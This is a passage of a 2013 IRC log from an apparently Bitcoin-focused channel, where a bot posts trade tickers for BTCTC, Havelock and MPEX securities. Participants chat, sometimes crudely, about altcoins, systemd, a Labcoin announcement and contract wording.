0.101 = 1.01 BTC [+] Sep 09 05:46:52 [BTCTC] [BTC-GROWTH] 6 @ 0.1011 = 0.6066 BTC [+] Sep 09 05:50:46 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Sep 09 05:55:19 i meant more in terms of if he manages to find tytus. Sep 09 05:58:44 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Sep 09 06:00:17 [BTCTC] [ACTIVEMINING] 6 @ 0.00355 = 0.0213 BTC [+] Sep 09 06:06:42 [BTCTC] [ASICMINER-PT] 2 @ 2.475 = 4.95 BTC [+] Sep 09 06:11:25 [BTCTC] [BTC-GROWTH] 3 @ 0.1011 = 0.3033 BTC [+] Sep 09 06:12:09 [BTCTC] [DMS.SELLING] 10 @ 0.009488 = 0.0949 BTC [+] Sep 09 06:13:30 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] Sep 09 06:13:32 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] Sep 09 06:13:33 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] Sep 09 06:13:38 [HAVELOCK] [AM1] 3 @ 2.333 = 6.999 BTC [+] Sep 09 06:18:50 [BTCTC] [LABCOIN] 50 @ 0.00379 = 0.1895 BTC [-] Sep 09 06:20:23 [BTCTC] [ACTIVEMINING] 168 @ 0.0035 = 0.588 BTC [-] Sep 09 06:21:25 [BTCTC] [ACTIVEMINING] 1 @ 0.003458 BTC [-] Sep 09 06:21:27 [BTCTC] [ACTIVEMINING] 31 @ 0.003458 = 0.1072 BTC [-] Sep 09 06:21:58 [BTCTC] [ACTIVEMINING] 69 @ 0.003458 = 0.2386 BTC [-] Sep 09 06:22:00 [BTCTC] [ACTIVEMINING] 15 @ 0.003456 = 0.0518 BTC [-] Sep 09 06:22:01 [BTCTC] [ACTIVEMINING] 216 @ 0.003455 = 0.7463 BTC [-] Sep 09 06:26:52 [BTCTC] [ASICMINER-PT] 2 @ 2.421 = 4.842 BTC [-] Sep 09 06:27:27 "Avahi is another Lenart Poetteing idea - like Pulse audio and systemd. These aren't bad ideas at all, but the implementation of each one has been a big headache. So submitting a bugzilla report that Lenart must address is a good way to slow/prevent the next 'Poetteing invention' from causing havoc." Sep 09 06:27:28 ahahaha Sep 09 06:27:42 "send poetteing to prison" petition. Sep 09 06:28:46 [BTCTC] [ASICMINER-PT] 7 @ 2.475 = 17.325 BTC [+] Sep 09 06:28:47 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Sep 09 06:28:49 [BTCTC] [ASICMINER-PT] 4 @ 2.478 = 9.912 BTC [+] Sep 09 06:28:50 [BTCTC] [ASICMINER-PT] 1 @ 2.478 BTC [+] Sep 09 06:28:51 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Sep 09 06:28:52 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Sep 09 06:28:52 [BTCTC] [ASICMINER-PT] 5 @ 2.482 = 12.41 BTC [+] Sep 09 06:29:34 [BTCTC] [TAT.MINIGAME] 100 @ 0.000238 = 0.0238 BTC [-] Sep 09 06:29:35 [BTCTC] [TAT.MINIGAME] 1 @ 0.000239 BTC [+] Sep 09 06:29:37 [BTCTC] [TAT.MINIGAME] 9 @ 0.000249 = 0.0022 BTC [+] Sep 09 06:29:38 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002589 BTC [+] Sep 09 06:29:39 [BTCTC] [TAT.MINIGAME] 2756 @ 0.0002754 = 0.759 BTC [+] Sep 09 06:31:15 [MPEX] [S.MPOE] 3450 @ 0.00089538 = 3.0891 BTC [+] Sep 09 06:31:16 [MPEX] [S.MPOE] 5050 @ 0.00089683 = 4.529 BTC [+] Sep 09 06:33:22 meh, all this hate isn't very warranted Sep 09 06:34:40 right. Sep 09 06:34:49 because linux REALLY needed plug-n-play. Sep 09 06:35:01 [BTCTC] [TAT.ASICMINER] 10 @ 0.02309 = 0.2309 BTC [+] Sep 09 06:35:02 [BTCTC] [TAT.ASICMINER] 32 @ 0.02309 = 0.7389 BTC [+] Sep 09 06:35:23 [HAVELOCK] [AM100] 5 @ 0.02189 = 0.1095 BTC [+] Sep 09 06:38:08 [MPEX] [S.MPOE] 2518 @ 0.00089683 = 2.2582 BTC [+] Sep 09 06:38:10 [MPEX] [S.MPOE] 1132 @ 0.00090066 = 1.0195 BTC [+] Sep 09 06:41:39 [BTCTC] [ASICMINER-PT] 1 @ 2.42 BTC [-] Sep 09 06:42:38 [BTCTC] [ASICMINER-PT] 1 @ 2.482 BTC [+] Sep 09 06:46:22 [MPEX] [S.MPOE] 2500 @ 0.00090066 = 2.2517 BTC [+] Sep 09 06:46:46 http://l33t.0pointer.de/?skill=5&url=http%3A%2F%2Fwww.trilema.com Sep 09 06:47:40 whoa Sep 09 06:47:45 suddenly trilema makes sense Sep 09 06:49:51 [BTCTC] [TAT.ASICMINER] 4 @ 0.02309 = 0.0924 BTC [+] Sep 09 06:49:53 [BTCTC] [TAT.ASICMINER] 74 @ 0.0231 = 1.7094 BTC [+] **** BEGIN LOGGING AT Mon Sep 9 18:18:04 2013 Sep 09 18:20:04 [HAVELOCK] [AM100] 10 @ 0.02315 = 0.2315 BTC [-] Sep 09 18:21:16 [BTCTC] [ASICMINER-PT] 2 @ 2.501 = 5.002 BTC [-] Sep 09 18:28:07 [BTCTC] [DMS.MINING] 17 @ 0.002739 = 0.0466 BTC [+] Sep 09 18:28:24 [BTCTC] [LABCOIN] 748 @ 0.003423 = 2.5604 BTC [+] Sep 09 18:29:45 [BTCTC] [LABCOIN] 45 @ 0.003423 = 0.154 BTC [+] Sep 09 18:30:18 [BTCTC] [ACTIVEMINING] 90 @ 0.00335 = 0.3015 BTC [-] Sep 09 18:32:45 [BTCTC] [BMF] 2 @ 0.03 = 0.06 BTC [-] Sep 09 18:34:21 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1999 = 0.5997 BTC [+] Sep 09 18:35:58 [BTCTC] [BMF] 1 @ 0.025 BTC [-] Sep 09 18:36:21 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.000617 = 0.0019 BTC [-] Sep 09 18:39:10 [BTCTC] [NASTY-PT] 10 @ 0.002 = 0.02 BTC [+] Sep 09 18:40:04 [BTCTC] [NASTY-PT] 3 @ 0.002 = 0.006 BTC [+] Sep 09 18:46:27 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.000617 = 0.0019 BTC [-] Sep 09 19:02:16 [BTCTC] [PAJKA.BOND] 49 @ 0.0125 = 0.6125 BTC [+] Sep 09 19:03:06 [BTCTC] [DMS.MINING] 3 @ 0.00274 = 0.0082 BTC [+] Sep 09 19:04:02 [BTCTC] [DMS.SELLING] 1 @ 0.009554 BTC [+] Sep 09 19:04:25 [BTCTC] [DMS.MINING] 10 @ 0.00251 = 0.0251 BTC [-] Sep 09 19:04:27 [BTCTC] [DMS.MINING] 20 @ 0.002509 = 0.0502 BTC [-] Sep 09 19:04:27 [BTCTC] [DMS.MINING] 5 @ 0.002507 = 0.0125 BTC [-] Sep 09 19:04:28 [BTCTC] [DMS.MINING] 119 @ 0.002505 = 0.2981 BTC [-] Sep 09 19:04:29 [BTCTC] [DMS.MINING] 25 @ 0.002502 = 0.0626 BTC [-] Sep 09 19:04:31 [BTCTC] [DMS.MINING] 5 @ 0.002502 = 0.0125 BTC [-] Sep 09 19:04:32 [BTCTC] [DMS.MINING] 20 @ 0.002501 = 0.05 BTC [-] Sep 09 19:04:33 [BTCTC] [DMS.MINING] 796 @ 0.0025 = 1.99 BTC [-] Sep 09 19:05:13 [BTCTC] [DMS.PURCHASE] 1 @ 0.01205 BTC [-] Sep 09 19:06:30 [BTCTC] [DMS.PURCHASE] 1 @ 0.01205 BTC [-] Sep 09 19:08:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.02375 = 0.0713 BTC [+] Sep 09 19:14:20 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.000617 = 0.0093 BTC [-] Sep 09 19:15:04 [MPEX] [S.BBET] 2710 @ 0.0005 = 1.355 BTC [-] Sep 09 19:16:10 [BTCTC] [DMS.PURCHASE] 1 @ 0.01205 BTC [-] Sep 09 19:16:12 [HAVELOCK] [XBOND] 30 @ 0.00108 = 0.0324 BTC [-] Sep 09 19:16:15 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] Sep 09 19:16:16 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] Sep 09 19:17:21 [BTCTC] [DMS.MINING] 1 @ 0.002738 BTC [+] Sep 09 19:18:59 [HAVELOCK] [AM100] 46 @ 0.0221 = 1.0166 BTC [-] Sep 09 19:21:08 [HAVELOCK] [LABCO] 10 @ 0.00333 = 0.0333 BTC [+] Sep 09 19:21:38 [BTCTC] [PETA-MINE] 4 @ 0.6598 = 2.6392 BTC [-] Sep 09 19:22:19 wao: skoda dnes nepridem, je mi nejako blbo Sep 09 19:22:22 [HAVELOCK] [LABCO] 123 @ 0.003339 = 0.4107 BTC [+] Sep 09 19:23:37 jurov: ;( Sep 09 19:23:38 bulb ?! Sep 09 19:23:51 akurat som zvazoval ze ci ist Sep 09 19:23:53 ale idem Sep 09 19:23:56 aj ked ma bolela halva Sep 09 19:24:29 mircea_popescu: vitalik butterin is visiting bratislava.. but i'm kinda sick Sep 09 19:24:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0228 BTC [-] Sep 09 19:24:47 well yes :) Sep 09 19:25:20 what i wish to know is what a bulb is lol Sep 09 19:25:55 if my bet proposal is rejected, will I get my funds back? Sep 09 19:26:03 blbo = stupid or feeling stupid Sep 09 19:26:35 pankkake: yes Sep 09 19:26:42 pankkake if you zeroconf it yes. Sep 09 19:26:45 [BTCTC] [ACTIVEMINING] 1 @ 0.003217 BTC [-] Sep 09 19:26:58 zeroconf? Sep 09 19:26:59 [BTCTC] [LABCOIN] 10 @ 0.003384 = 0.0338 BTC [-] Sep 09 19:27:02 [BTCTC] [LABCOIN] 5 @ 0.003385 = 0.0169 BTC [+] Sep 09 19:28:32 if you send some btc along with the bet when you make it, you get that back. Sep 09 19:28:59 ok, thanks Sep 09 19:32:15 [MPEX] [S.MPOE] 1569 @ 0.00089408 = 1.4028 BTC [+] Sep 09 19:32:16 [MPEX] [S.MPOE] 6950 @ 0.0008942 = 6.2147 BTC [+] Sep 09 19:32:28 [MPEX] [S.MPOE] 676 @ 0.00089433 = 0.6046 BTC [+] Sep 09 19:34:27 [MPEX] [S.MPOE] 9655 @ 0.00089433 = 8.6348 BTC [+] Sep 09 19:34:28 [BTCTC] [ACTIVEMINING] 1 @ 0.003217 BTC [-] Sep 09 19:35:04 [BTCTC] [LABCOIN] 637 @ 0.003423 = 2.1805 BTC [+] Sep 09 19:35:04 [BTCTC] [LABCOIN] 1274 @ 0.003425 = 4.3635 BTC [+] Sep 09 19:36:47 [MPEX] [S.MPOE] 2951 @ 0.00089433 = 2.6392 BTC [+] Sep 09 19:38:37 mircea_popescu: does chett check trilema often? Sep 09 19:39:41 [BTCTC] [LABCOIN] 3000 @ 0.003428 = 10.284 BTC [+] Sep 09 19:42:43 [BTCTC] [ASICMINER-PT] 1 @ 2.439 BTC [-] Sep 09 19:43:13 [BTCTC] [KENILWORTH] 60 @ 0.001787 = 0.1072 BTC [-] Sep 09 19:43:15 [BTCTC] [KENILWORTH] 40 @ 0.001788 = 0.0715 BTC [+] Sep 09 19:43:59 on occasion, i dunno Sep 09 19:44:00 why ? Sep 09 19:44:23 i was gonna give her models Sep 09 19:44:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.02373 BTC [+] Sep 09 19:44:46 [BTCTC] [TAT.ASICMINER] 7 @ 0.02374 = 0.1662 BTC [+] Sep 09 19:44:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.02375 = 0.1663 BTC [+] Sep 09 19:47:11 could you ping her for me? Sep 09 19:47:13 don't worry, they're not going to get forgotten if you put a link there. Sep 09 19:47:18 k Sep 09 19:47:34 lemme get to a pc Sep 09 19:48:04 [BTCTC] [LABCOIN] 50 @ 0.003456 = 0.1728 BTC [+] Sep 09 19:48:37 [BTCTC] [ACTIVEMINING] 20 @ 0.003338 = 0.0668 BTC [+] Sep 09 19:48:43 [HAVELOCK] [SDSTM] 10 @ 0.00310002 = 0.031 BTC [-] Sep 09 19:48:48 [BTCTC] [BASIC-MINING] 1 @ 0.13 BTC [+] Sep 09 19:49:07 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [+] Sep 09 19:49:08 [BTCTC] [ASICMINER-PT] 3 @ 2.488 = 7.464 BTC [+] Sep 09 19:49:45 [BTCTC] [ACTIVEMINING] 20 @ 0.003338 = 0.0668 BTC [+] Sep 09 19:49:54 so what's new Sep 09 19:50:12 [BTCTC] [ACTIVEMINING] 10 @ 0.003338 = 0.0334 BTC [+] Sep 09 19:50:20 [BTCTC] [CB.IDIFF-E] 4 @ 0.025 = 0.1 BTC [+] Sep 09 19:51:05 one day closer to major labcoin movement, guess the direction to win or lose big Sep 09 19:51:08 [BTCTC] [TAT.ASICMINER] 58 @ 0.02375 = 1.3775 BTC [+] Sep 09 19:51:27 [BTCTC] [DMS.MINING] 9 @ 0.002736 = 0.0246 BTC [-] Sep 09 19:51:42 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] Sep 09 19:51:43 [BTCTC] [ASICMINER-PT] 1 @ 2.439 BTC [-] Sep 09 19:51:45 [BTCTC] [ASICMINER-PT] 3 @ 2.438 = 7.314 BTC [-] Sep 09 19:51:47 bitmine.ch was releasing a 28nm asic today Sep 09 19:51:50 Duffer1 the upside is a lot more limited. Sep 09 19:51:55 jcpham hasn't happened. Sep 09 19:52:01 [BTCTC] [LABCOIN] 200 @ 0.003456 = 0.6912 BTC [+] Sep 09 19:52:17 "was"? Sep 09 19:52:34 is Sep 09 19:52:34 20 UTC iirc Sep 09 19:52:34 you're probably right mp Sep 09 19:52:43 [BTCTC] [DMS.PURCHASE] 2 @ 0.01205 = 0.0241 BTC [-] Sep 09 19:53:04 [MPEX] [S.MPOE] 1800 @ 0.00089433 = 1.6098 BTC [+] Sep 09 19:53:04 it'll be pretty entertaining to watch either way tomorrow Sep 09 19:53:24 What is the time zone that they are going by anyhow? Sep 09 19:53:36 zulu Sep 09 19:53:41 probably us east coast for swede i believe Sep 09 19:54:00 but if it's labcoin making the announce then who knows Sep 09 19:54:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02283 BTC [-] Sep 09 19:54:32 also coinlab's whatever you call it Sep 09 19:54:36 ;;nethash Sep 09 19:54:37 771901.630227 Sep 09 19:54:38 selling preorders Sep 09 19:54:43 [BTCTC] [DMS.SELLING] 1 @ 0.009351 BTC [-] Sep 09 19:54:45 [BTCTC] [DMS.SELLING] 1 @ 0.00935 BTC [-] Sep 09 19:54:58 was 700000 not long ago Sep 09 19:55:06 some big swings lately Sep 09 19:55:10 http://www.cryptocoinsnews.com/2013/09/09/digitalcoin-update-attempts-to-ward-off-multipools/ this makes me very happy. keep on destroying shit coins Sep 09 19:55:14 Digitalcoin update attempts to ward off multipools | Cryptocurrency News, Cryptocoins News Sep 09 19:55:24 [BTCTC] [DMS.SELLING] 1 @ 0.009554 BTC [+] Sep 09 19:56:15 Duffer1 why tomorrow specifically ? Sep 09 19:57:06 28nm looks to be saturated by Q1 2014 Sep 09 19:57:06 they're supposed to announce proof of hashing hardware Sep 09 19:57:22 " Now, if you are doing this as individuals, it doesn’t impact the overall network of that coin too much. Afterall, more mining power means a wider spread of the network, which also strengthens it." Sep 09 19:57:26 these people are so fucking retarded Sep 09 19:57:39 there is no such difference between individuals and corporations. at all. none. Sep 09 19:58:00 i dunno why this bit of medieval "thinking" keeps popping up in xxith century Sep 09 19:58:55 "As most of you will probably know, the Multiport on Multipool packs quite some hashpower, in excess of 750 MHash/second" Sep 09 19:58:59 oook. lol. Sep 09 19:59:32 [BTCTC] [DMS.SELLING] 1 @ 0.009554 BTC [+] Sep 09 19:59:48 alt coins are retarded imo Sep 09 19:59:51 middlecoin is the perfect destroyer of altcoins, as it immediately corrects value anomalies Sep 09 19:59:55 i refuse to setup a litecoin wallet Sep 09 20:00:33 there are some decent plays with LTC Sep 09 20:00:40 ^ Sep 09 20:00:50 all my litecoins are on litecoin global now Sep 09 20:00:53 yes but i refuse Sep 09 20:01:42 the best uses cases i've seen for litecoin in the wild are: Sep 09 20:01:47 pump and dump for bitcoin Sep 09 20:01:51 or botnet mining Sep 09 20:02:04 jcpham not quite as retarded as the people making them Sep 09 20:02:10 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [+] Sep 09 20:02:11 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [+] Sep 09 20:02:12 [BTCTC] [ASICMINER-PT] 3 @ 2.489 = 7.467 BTC [+] Sep 09 20:02:13 not sure i see the value there Sep 09 20:02:13 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [+] Sep 09 20:02:14 [BTCTC] [ASICMINER-PT] 40 @ 2.49 = 99.6 BTC [+] Sep 09 20:02:15 [BTCTC] [ASICMINER-PT] 20 @ 2.49 = 49.8 BTC [+] Sep 09 20:02:16 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Sep 09 20:02:17 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Sep 09 20:02:24 actually the intellectual distance between alt coins and alt coiners is larger than the same distance between bitcoin and bitcoiners. Sep 09 20:02:46 [BTCTC] [DMS.MINING] 5 @ 0.002736 = 0.0137 BTC [-] Sep 09 20:03:33 mircea_popescu https://bitcointalk.org/index.php?topic=263445.msg3024941#msg3024941 Sep 09 20:03:51 http://www.cryptocoinsnews.com/2013/09/09/digitalcoin-update-attempts-to-ward-off-multipools/#comment-3446 << lol Sep 09 20:03:53 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Sep 09 20:03:58 Digitalcoin update attempts to ward off multipools | Cryptocurrency News, Cryptocoins News Sep 09 20:04:02 Duffer1 sfw ? Sep 09 20:04:08 who was the person making physical bitcoins of recently Sep 09 20:04:09 not cas Sep 09 20:04:12 the other guy Sep 09 20:04:23 ya that's just link to the labcoin thread Sep 09 20:04:42 Duffer1 anyway, not like it matters. they'll pay "dividends" and not publish any pics Sep 09 20:04:43 don't listen, it#s furry porn! Sep 09 20:04:44 [BTCTC] [DMS.SELLING] 8 @ 0.009554 = 0.0764 BTC [+] Sep 09 20:04:46 whoopdedoo. Sep 09 20:04:57 [BTCTC] [DMS.MINING] 6 @ 0.002736 = 0.0164 BTC [-] Sep 09 20:05:22 you may very well be right, but either way, we'll probably see big moves tomorrw Sep 09 20:05:26 [BTCTC] [ACTIVEMINING] 7 @ 0.003204 = 0.0224 BTC [-] Sep 09 20:05:26 [BTCTC] [ACTIVEMINING] 10 @ 0.003203 = 0.032 BTC [-] Sep 09 20:05:28 [BTCTC] [ACTIVEMINING] 21 @ 0.003201 = 0.0672 BTC [-] Sep 09 20:05:29 [BTCTC] [ACTIVEMINING] 75 @ 0.003181 = 0.2386 BTC [-] Sep 09 20:05:30 [BTCTC] [ACTIVEMINING] 10 @ 0.00318 = 0.0318 BTC [-] Sep 09 20:05:31 [BTCTC] [ACTIVEMINING] 40 @ 0.00318 = 0.1272 BTC [-] Sep 09 20:05:41 [BTCTC] [DMS.PURCHASE] 6 @ 0.01205 = 0.0723 BTC [-] Sep 09 20:06:09 Duffer1 i bet you we see no moves tomorrow at all. Sep 09 20:06:13 actually probably see a lot of activemining movement also Sep 09 20:06:22 the various scams have just been trading on script all through the asicminer panic Sep 09 20:06:32 they will continue to do so for as long as burnside continues to fake his trades. Sep 09 20:06:45 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Sep 09 20:07:17 when i say movement i mean it could go up or down, i just believe it will do so in volume Sep 09 20:08:04 except it can;t. Sep 09 20:08:07 last week swede was a day late for an announcement and the share price dropped 55% Sep 09 20:08:19 lol Sep 09 20:08:19 they're locked from going up because the few putzes would sell out, leaving them with a minimal but negative net Sep 09 20:08:32 they're locked from going down because what, might as well come suck my cock. Sep 09 20:08:34 so... nothing happens. Sep 09 20:08:35 [BTCTC] [DMS.SELLING] 2 @ 0.009351 = 0.0187 BTC [-] Sep 09 20:08:36 [BTCTC] [DMS.SELLING] 35 @ 0.00935 = 0.3273 BTC [-] Sep 09 20:09:05 when was this 55% drop ? Sep 09 20:09:10 i must've missed it. Sep 09 20:09:54 [BTCTC] [ASICMINER-PT] 5 @ 2.5 = 12.5 BTC [+] Sep 09 20:10:21 http://www.coinflow.co/chart/LABCOIN 28th Sep 09 20:10:24 LABCOIN on Coinflow Sep 09 20:10:25 http://i.imgur.com/WsEC71J.jpg Sep 09 20:10:33 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Sep 09 20:11:08 dexx7 where'd you get that chart? Sep 09 20:11:13 + http://i.imgur.com/XoFZMBc.png Sep 09 20:11:27 nice chart dexX7 ty Sep 09 20:11:28 [BTCTC] [LABCOIN] 179 @ 0.003456 = 0.6186 BTC [+] Sep 09 20:11:34 historical data import into ninjatrader + parsed btct api Sep 09 20:12:08 thank you :) Sep 09 20:12:34 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Sep 09 20:13:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.02374 BTC [+] Sep 09 20:13:11 [BTCTC] [TAT.ASICMINER] 78 @ 0.02375 = 1.8525 BTC [+] Sep 09 20:13:12 [BTCTC] [TAT.ASICMINER] 25 @ 0.02375 = 0.5938 BTC [+] Sep 09 20:13:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0239 BTC [+] Sep 09 20:16:08 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [+] Sep 09 20:17:34 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] Sep 09 20:20:13 [HAVELOCK] [XBOND] 1380 @ 0.00108 = 1.4904 BTC [-] Sep 09 20:24:29 [BTCTC] [ASICMINER-PT] 5 @ 2.51 = 12.55 BTC [+] Sep 09 20:26:47 [MPEX] [S.MPOE] 4700 @ 0.00089367 = 4.2002 BTC [-] Sep 09 20:27:06 [BTCTC] [B.YABMC] 5 @ 0.00099 = 0.005 BTC [+] Sep 09 20:27:49 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] Sep 09 20:28:07 [BTCTC] [TAT.ASICMINER] 105 @ 0.02379 = 2.498 BTC [-] Sep 09 20:38:44 [BTCTC] [LABCOIN] 200 @ 0.003456 = 0.6912 BTC [+] Sep 09 20:38:44 [BTCTC] [LABCOIN] 100 @ 0.003457 = 0.3457 BTC [+] Sep 09 20:38:44 [BTCTC] [LABCOIN] 548 @ 0.003492 = 1.9136 BTC [+] Sep 09 20:38:44 [BTCTC] [LABCOIN] 484 @ 0.003493 = 1.6906 BTC [+] Sep 09 20:40:04 [BTCTC] [CB.IDIFF-O] 25 @ 0.00984 = 0.246 BTC [+] Sep 09 20:40:14 [BTCTC] [CB.IDIFF-O] 47 @ 0.00985 = 0.463 BTC [+] Sep 09 20:40:15 [BTCTC] [CB.IDIFF-O] 25 @ 0.00986 = 0.2465 BTC [+] Sep 09 20:40:17 [BTCTC] [CB.IDIFF-O] 50 @ 0.009875 = 0.4938 BTC [+] Sep 09 20:41:35 [MPEX] [S.MPOE] 5850 @ 0.00089433 = 5.2318 BTC [+] Sep 09 20:41:39 [HAVELOCK] [SDSTM] 20 @ 0.00310002 = 0.062 BTC [-] Sep 09 20:41:57 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [-] Sep 09 20:43:27 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [-] Sep 09 20:45:52 [BTCTC] [LABCOIN] 548 @ 0.003546 = 1.9432 BTC [+] Sep 09 20:46:49 [BTCTC] [LABCOIN] 472 @ 0.003546 = 1.6737 BTC [+] Sep 09 20:46:49 [BTCTC] [LABCOIN] 1210 @ 0.003548 = 4.2931 BTC [+] Sep 09 20:49:44 [HAVELOCK] [XBOND] 909 @ 0.0011 = 0.9999 BTC [+] Sep 09 20:51:03 [BTCTC] [TAT.ASICMINER] 32 @ 0.02379 = 0.7613 BTC [-] Sep 09 20:53:32 [BTCTC] [PETA-MINE] 10 @ 0.6599 = 6.599 BTC [+] Sep 09 20:54:17 [BTCTC] [ACTIVEMINING] 200 @ 0.003201 = 0.6402 BTC [+] Sep 09 20:54:18 [BTCTC] [ACTIVEMINING] 9340 @ 0.0032 = 29.888 BTC [-] Sep 09 20:56:14 [BTCTC] [CB.IDIFF-E] 17 @ 0.025 = 0.425 BTC [+] Sep 09 20:56:29 [BTCTC] [LABCOIN] 4 @ 0.003547 = 0.0142 BTC [-] Sep 09 20:56:30 [BTCTC] [LABCOIN] 450 @ 0.00356 = 1.602 BTC [+] Sep 09 20:56:32 [BTCTC] [LABCOIN] 100 @ 0.003565 = 0.3565 BTC [+] Sep 09 20:56:58 [BTCTC] [LABCOIN] 330 @ 0.003597 = 1.187 BTC [+] Sep 09 20:56:59 [BTCTC] [LABCOIN] 472 @ 0.003599 = 1.6987 BTC [+] Sep 09 20:57:01 [BTCTC] [LABCOIN] 7598 @ 0.0036 = 27.3528 BTC [+] Sep 09 20:57:48 [BTCTC] [LABCOIN] 35 @ 0.003598 = 0.1259 BTC [-] Sep 09 20:58:04 [BTCTC] [LABCOIN] 5 @ 0.003598 = 0.018 BTC [-] Sep 09 20:58:17 [BTCTC] [LABCOIN] 3 @ 0.003598 = 0.0108 BTC [-] Sep 09 20:58:47 mircea_popescu: how do avatars work again? Sep 09 20:59:17 [BTCTC] [LABCOIN] 287 @ 0.003598 = 1.0326 BTC [-] Sep 09 20:59:19 [BTCTC] [LABCOIN] 913 @ 0.0036 = 3.2868 BTC [+] Sep 09 20:59:32 [HAVELOCK] [LABCO] 138 @ 0.003488 = 0.4813 BTC [+] Sep 09 20:59:47 [BTCTC] [ACTIVEMINING] 56 @ 0.003206 = 0.1795 BTC [+] Sep 09 20:59:48 [BTCTC] [ACTIVEMINING] 10 @ 0.003205 = 0.0321 BTC [-] Sep 09 20:59:50 [BTCTC] [ACTIVEMINING] 216 @ 0.003204 = 0.6921 BTC [-] Sep 09 20:59:51 [BTCTC] [ACTIVEMINING] 716 @ 0.003201 = 2.2919 BTC [-] Sep 09 20:59:51 [BTCTC] [ACTIVEMINING] 2335 @ 0.0032 = 7.472 BTC [-] Sep 09 21:00:14 [HAVELOCK] [AM100] 1 @ 0.02319 BTC [+] Sep 09 21:00:28 you need a file named avatar.png in the root of the url which you use Sep 09 21:00:59 [BTCTC] [ACTIVEMINING] 73 @ 0.003304 = 0.2412 BTC [+] Sep 09 21:01:27 [BTCTC] [ASICMINER-PT] 1 @ 2.514 BTC [+] Sep 09 21:01:28 [BTCTC] [ACTIVEMINING] 10 @ 0.003305 = 0.0331 BTC [+] Sep 09 21:01:35 [BTCTC] [ACTIVEMINING] 136 @ 0.003307 = 0.4498 BTC [+] Sep 09 21:01:39 [HAVELOCK] [LABCO] 112 @ 0.003488 = 0.3907 BTC [+] Sep 09 21:01:58 [BTCTC] [ASICMINER-PT] 3 @ 2.515 = 7.545 BTC [+] Sep 09 21:02:53 [BTCTC] [LABCOIN] 278 @ 0.003598 = 1.0002 BTC [-] Sep 09 21:02:54 [BTCTC] [LABCOIN] 2614 @ 0.0036 = 9.4104 BTC [+] Sep 09 21:03:08 kay I see now Sep 09 21:03:13 [BTCTC] [LABCOIN] 154 @ 0.003598 = 0.5541 BTC [-] Sep 09 21:03:13 I'll try it for my future coments Sep 09 21:03:32 [HAVELOCK] [AM1] 1 @ 2.36 BTC [-] Sep 09 21:03:34 [HAVELOCK] [AM1] 1 @ 2.35 BTC [-] Sep 09 21:03:36 [HAVELOCK] [AM1] 2 @ 2.3 = 4.6 BTC [-] Sep 09 21:03:44 [BTCTC] [ASICMINER-PT] 8 @ 2.5 = 20 BTC [-] Sep 09 21:04:30 posted some screens of what the modeler is developing in terms of a goblin Sep 09 21:04:48 he's super busy so if it's in the right direction he can reprioritize Sep 09 21:05:34 [BTCTC] [CB.IDIFF-E] 10 @ 0.025 = 0.25 BTC [+] Sep 09 21:05:49 [BTCTC] [FIMB] 1 @ 0.011 BTC [+] Sep 09 21:06:03 [BTCTC] [CB.IDIFF-E] 10 @ 0.025 = 0.25 BTC [+] Sep 09 21:06:41 [BTCTC] [LABCOIN] 84 @ 0.003598 = 0.3022 BTC [-] Sep 09 21:06:42 [BTCTC] [LABCOIN] 741 @ 0.0036 = 2.6676 BTC [+] Sep 09 21:09:23 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.000617 = 0.0025 BTC [-] Sep 09 21:11:49 [HAVELOCK] [AM100] 1 @ 0.02319 BTC [+] Sep 09 21:12:21 jurov, yknow the contract for CB.IDIFF-E is inaccurate? Sep 09 21:12:22 The one thing about blu-ecgis.... Even though they're a state above me, it stills seems to take almost 2 weeks from order to delivery. I'll never understand that Sep 09 21:12:52 I see correct details in the News, which could work if the contract pointed there Sep 09 21:12:59 instead of being outdated Sep 09 21:13:04 that would not surpise me, where? Sep 09 21:13:18 it uses the previois diff-o details Sep 09 21:13:24 as the contract Sep 09 21:13:44 it does say "Asset works in the same way as IDIFF-O except for expiration dates, thus same example applies:" Sep 09 21:13:54 [BTCTC] [LABCOIN] 1 @ 0.003598 BTC [-] Sep 09 21:14:06 you and your examples Sep 09 21:14:39 i see the header now that you say it Sep 09 21:15:08 the shorting example would be nice to have updated in the news Sep 09 21:15:14 and just point to that for info Sep 09 21:15:20 [MPEX] [S.MPOE] 1850 @ 0.00089433 = 1.6545 BTC [+] Sep 09 21:15:38 or move that aspect of the contract to 